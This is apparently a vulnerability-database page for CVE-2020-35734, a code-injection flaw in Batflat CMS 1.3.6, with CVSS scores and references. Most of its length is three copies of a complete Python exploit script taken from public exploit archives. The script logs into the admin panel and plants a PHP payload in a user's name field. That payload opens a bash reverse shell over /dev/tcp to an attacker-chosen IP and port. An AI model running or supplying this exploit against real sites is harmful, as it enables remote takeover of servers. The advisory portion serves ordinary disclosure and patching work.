Description
** UNSUPPORTED WHEN ASSIGNED ** Sruu.pl in Batflat 1.3.6 allows an authenticated user to perform code injection (and consequently Remote Code Execution) via the input fields of the Users tab. To exploit this, one must login to the administration panel and edit an arbitrary user's data (username, displayed name, etc.). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
Affected Software
Related
{"id": "CVE-2020-35734", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-35734", "description": "** UNSUPPORTED WHEN ASSIGNED ** Sruu.pl in Batflat 1.3.6 allows an authenticated user to perform code injection (and consequently Remote Code Execution) via the input fields of the Users tab. To exploit this, one must login to the administration panel and edit an arbitrary user's data (username, displayed name, etc.). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.", "published": "2021-02-15T21:15:00", "modified": "2021-07-21T11:39:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.5}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35734", "reporter": "cve@mitre.org", "references": ["https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/", "https://batflat.org/en/changelog", "https://github.com/sruupl/batflat/issues/98", "http://packetstormsecurity.com/files/161457/Batflat-CMS-1.3.6-Remote-Code-Execution.html"], "cvelist": ["CVE-2020-35734"], "immutableFields": [], "lastseen": "2022-03-23T17:58:37", "viewCount": 33, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49573"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161457"]}, {"type": "zdt", "idList": ["1337DAY-ID-35838"]}], "rev": 4}, "score": {"value": 6.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49573"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161457"]}, {"type": "zdt", "idList": ["1337DAY-ID-35838"]}]}, "exploitation": null, "vulnersScore": 6.1}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:batflat:batflat:1.3.6"], "cpe23": ["cpe:2.3:a:batflat:batflat:1.3.6:*:*:*:*:*:*:*"], "cwe": ["CWE-94"], "affectedSoftware": [{"cpeName": "batflat:batflat", "version": "1.3.6", "operator": "eq", "name": "batflat"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:batflat:batflat:1.3.6:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/", "name": "https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://batflat.org/en/changelog", "name": "https://batflat.org/en/changelog", "refsource": "MISC", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://github.com/sruupl/batflat/issues/98", "name": "https://github.com/sruupl/batflat/issues/98", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/161457/Batflat-CMS-1.3.6-Remote-Code-Execution.html", "name": "http://packetstormsecurity.com/files/161457/Batflat-CMS-1.3.6-Remote-Code-Execution.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"exploitdb": [{"lastseen": "2022-05-13T17:39:46", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-18T00:00:00", "type": "exploitdb", "title": "Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35734"], "modified": "2021-02-18T00:00:00", "id": "EDB-ID:49573", "href": "https://www.exploit-db.com/exploits/49573", "sourceData": "# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)\r\n# Date: 2020-12-27\r\n# Exploit Author: mari0x00\r\n# Vendor Homepage: https://batflat.org/\r\n# Software Link: https://github.com/sruupl/batflat/archive/master.zip\r\n# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/\r\n# Version: <= 1.3.6\r\n# CVE: CVE-2020-35734\r\n\r\n#!/usr/bin/python3\r\n\r\nimport requests\r\nimport sys\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nfrom termcolor import colored\r\nfrom time import sleep\r\n\r\nprint(colored('''###########################################################''',\"red\"))\r\nprint(colored('''####### Batflat authenticated RCE by mari0x00 #######''',\"red\"))\r\nprint(colored('''###########################################################''',\"red\"))\r\nprint(\"\")\r\n\r\nif len(sys.argv) != 6:\r\n print((colored(\"[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>\",\"red\")))\r\n print((colored(\"[~] Default credentials: admin/admin\",\"red\")))\r\n print((colored(\"[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444\",\"red\")))\r\n exit()\r\nurl = sys.argv[1]\r\nusername = sys.argv[2]\r\npassword = sys.argv[3]\r\nIP = sys.argv[4]\r\nPORT = sys.argv[5]\r\n\r\n\r\n#Start session\r\ns = requests.Session()\r\nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}\r\n\r\n\r\n#Authenticate\r\nprint((colored(\"[+] Attempting user login\",\"blue\")))\r\n\r\nlogin_data = {\r\n \"username\": username,\r\n \"password\": password,\r\n \"login\": \"\",\r\n }\r\n\r\nlogin = s.post(url+\"admin/\", login_data, headers=headers)\r\nsleep(0.5)\r\n\r\n#Get token\r\nprint((colored(\"[+] Retrieving the token\",\"blue\")))\r\nr = s.get(url+\"admin/\", headers=headers).content\r\nsoup = BeautifulSoup(r, \"lxml\")\r\ntoken = (re.search(r't=(.*?)\">Add', str(soup)).group(1))\r\nprint((colored(\"[+] Token ID: \" + token,\"blue\")))\r\nsleep(0.5)\r\n\r\n#Get URL\r\nprint((colored(\"[+] Getting the add-user endpoint URL\",\"blue\")))\r\nr = s.get(url+\"admin/users/add?t=\"+token, headers=headers).content\r\nsoup = BeautifulSoup(r, \"lxml\")\r\nadd_user_url = (re.search(r'action=\"(.*?)\"', str(soup)).group(1))\r\nsleep(0.5)\r\n\r\n#Exploit\r\nprint((colored(\"[+] Adding pwnd user\",\"blue\")))\r\npayload = \"<?php system(\\\"/bin/bash -c 'bash -i >& /dev/tcp/\" + IP + \"/\" + PORT + \" 0>&1'\\\");?>\"\r\n\r\nadd_user = {\r\n \"username\": (None, \"pwnd\"),\r\n \"fullname\": (None, payload),\r\n \"description\": (None, \"pwnd\"),\r\n \"email\": (None, \"pwnd@evil.com\"),\r\n \"password\": (None, \"pwnd123\"),\r\n \"access[]\": (None, \"users\"),\r\n \"save\": (None, \"Save\")\r\n}\r\n\r\nexploit = s.post(add_user_url, headers=headers, files=add_user)\r\nsleep(0.5)\r\n\r\n#Triggering reverse shell\r\nprint(\"\")\r\nprint((colored(\"[+] Triggering the shell. Go nuts!\",\"green\")))\r\nr = s.get(url+\"admin/users/manage?t=\"+token, headers=headers)", "sourceHref": "https://www.exploit-db.com/download/49573", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-09-01T22:25:19", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-18T00:00:00", "type": "zdt", "title": "Batflat CMS 1.3.6 - Remote Code Execution (Authenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35734"], "modified": "2021-02-18T00:00:00", "id": "1337DAY-ID-35838", "href": "https://0day.today/exploit/description/35838", "sourceData": "# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)\r\n# Exploit Author: mari0x00\r\n# Vendor Homepage: https://batflat.org/\r\n# Software Link: https://github.com/sruupl/batflat/archive/master.zip\r\n# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/\r\n# Version: <= 1.3.6\r\n# CVE: CVE-2020-35734\r\n\r\n#!/usr/bin/python3\r\n\r\nimport requests\r\nimport sys\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nfrom termcolor import colored\r\nfrom time import sleep\r\n\r\nprint(colored('''###########################################################''',\"red\"))\r\nprint(colored('''####### Batflat authenticated RCE by mari0x00 #######''',\"red\"))\r\nprint(colored('''###########################################################''',\"red\"))\r\nprint(\"\")\r\n\r\nif len(sys.argv) != 6:\r\n print((colored(\"[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>\",\"red\")))\r\n print((colored(\"[~] Default credentials: admin/admin\",\"red\")))\r\n print((colored(\"[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444\",\"red\")))\r\n exit()\r\nurl = sys.argv[1]\r\nusername = sys.argv[2]\r\npassword = sys.argv[3]\r\nIP = sys.argv[4]\r\nPORT = sys.argv[5]\r\n\r\n\r\n#Start session\r\ns = requests.Session()\r\nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}\r\n\r\n\r\n#Authenticate\r\nprint((colored(\"[+] Attempting user login\",\"blue\")))\r\n\r\nlogin_data = {\r\n \"username\": username,\r\n \"password\": password,\r\n \"login\": \"\",\r\n }\r\n\r\nlogin = s.post(url+\"admin/\", login_data, headers=headers)\r\nsleep(0.5)\r\n\r\n#Get token\r\nprint((colored(\"[+] Retrieving the token\",\"blue\")))\r\nr = s.get(url+\"admin/\", headers=headers).content\r\nsoup = BeautifulSoup(r, \"lxml\")\r\ntoken = (re.search(r't=(.*?)\">Add', str(soup)).group(1))\r\nprint((colored(\"[+] Token ID: \" + token,\"blue\")))\r\nsleep(0.5)\r\n\r\n#Get URL\r\nprint((colored(\"[+] Getting the add-user endpoint URL\",\"blue\")))\r\nr = s.get(url+\"admin/users/add?t=\"+token, headers=headers).content\r\nsoup = BeautifulSoup(r, \"lxml\")\r\nadd_user_url = (re.search(r'action=\"(.*?)\"', str(soup)).group(1))\r\nsleep(0.5)\r\n\r\n#Exploit\r\nprint((colored(\"[+] Adding pwnd user\",\"blue\")))\r\npayload = \"<?php system(\\\"/bin/bash -c 'bash -i >& /dev/tcp/\" + IP + \"/\" + PORT + \" 0>&1'\\\");?>\"\r\n\r\nadd_user = {\r\n \"username\": (None, \"pwnd\"),\r\n \"fullname\": (None, payload),\r\n \"description\": (None, \"pwnd\"),\r\n \"email\": (None, \"[email\u00a0protected]\"),\r\n \"password\": (None, \"pwnd123\"),\r\n \"access[]\": (None, \"users\"),\r\n \"save\": (None, \"Save\")\r\n}\r\n\r\nexploit = s.post(add_user_url, headers=headers, files=add_user)\r\nsleep(0.5)\r\n\r\n#Triggering reverse shell\r\nprint(\"\")\r\nprint((colored(\"[+] Triggering the shell. Go nuts!\",\"green\")))\r\nr = s.get(url+\"admin/users/manage?t=\"+token, headers=headers)\n\n# 0day.today [2021-09-02] #", "sourceHref": "https://0day.today/exploit/35838", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-02-18T14:21:54", "description": "", "published": "2021-02-18T00:00:00", "type": "packetstorm", "title": "Batflat CMS 1.3.6 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-35734"], "modified": "2021-02-18T00:00:00", "id": "PACKETSTORM:161457", "href": "https://packetstormsecurity.com/files/161457/Batflat-CMS-1.3.6-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated) \n# Date: 2020-12-27 \n# Exploit Author: mari0x00 \n# Vendor Homepage: https://batflat.org/ \n# Software Link: https://github.com/sruupl/batflat/archive/master.zip \n# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/ \n# Version: <= 1.3.6 \n# CVE: CVE-2020-35734 \n \n#!/usr/bin/python3 \n \nimport requests \nimport sys \nimport re \nfrom bs4 import BeautifulSoup \nfrom termcolor import colored \nfrom time import sleep \n \nprint(colored('''###########################################################''',\"red\")) \nprint(colored('''####### Batflat authenticated RCE by mari0x00 #######''',\"red\")) \nprint(colored('''###########################################################''',\"red\")) \nprint(\"\") \n \nif len(sys.argv) != 6: \nprint((colored(\"[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>\",\"red\"))) \nprint((colored(\"[~] Default credentials: admin/admin\",\"red\"))) \nprint((colored(\"[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444\",\"red\"))) \nexit() \nurl = sys.argv[1] \nusername = sys.argv[2] \npassword = sys.argv[3] \nIP = sys.argv[4] \nPORT = sys.argv[5] \n \n \n#Start session \ns = requests.Session() \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} \n \n \n#Authenticate \nprint((colored(\"[+] Attempting user login\",\"blue\"))) \n \nlogin_data = { \n\"username\": username, \n\"password\": password, \n\"login\": \"\", \n} \n \nlogin = s.post(url+\"admin/\", login_data, headers=headers) \nsleep(0.5) \n \n#Get token \nprint((colored(\"[+] Retrieving the token\",\"blue\"))) \nr = s.get(url+\"admin/\", headers=headers).content \nsoup = BeautifulSoup(r, \"lxml\") \ntoken = (re.search(r't=(.*?)\">Add', str(soup)).group(1)) \nprint((colored(\"[+] Token ID: \" + token,\"blue\"))) \nsleep(0.5) \n \n#Get URL \nprint((colored(\"[+] Getting the add-user endpoint URL\",\"blue\"))) \nr = s.get(url+\"admin/users/add?t=\"+token, headers=headers).content \nsoup = BeautifulSoup(r, \"lxml\") \nadd_user_url = (re.search(r'action=\"(.*?)\"', str(soup)).group(1)) \nsleep(0.5) \n \n#Exploit \nprint((colored(\"[+] Adding pwnd user\",\"blue\"))) \npayload = \"<?php system(\\\"/bin/bash -c 'bash -i >& /dev/tcp/\" + IP + \"/\" + PORT + \" 0>&1'\\\");?>\" \n \nadd_user = { \n\"username\": (None, \"pwnd\"), \n\"fullname\": (None, payload), \n\"description\": (None, \"pwnd\"), \n\"email\": (None, \"pwnd@evil.com\"), \n\"password\": (None, \"pwnd123\"), \n\"access[]\": (None, \"users\"), \n\"save\": (None, \"Save\") \n} \n \nexploit = s.post(add_user_url, headers=headers, files=add_user) \nsleep(0.5) \n \n#Triggering reverse shell \nprint(\"\") \nprint((colored(\"[+] Triggering the shell. Go nuts!\",\"green\"))) \nr = s.get(url+\"admin/users/manage?t=\"+token, headers=headers) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161457/batflatcms136-exec.txt"}]}
CVE-2020-35734
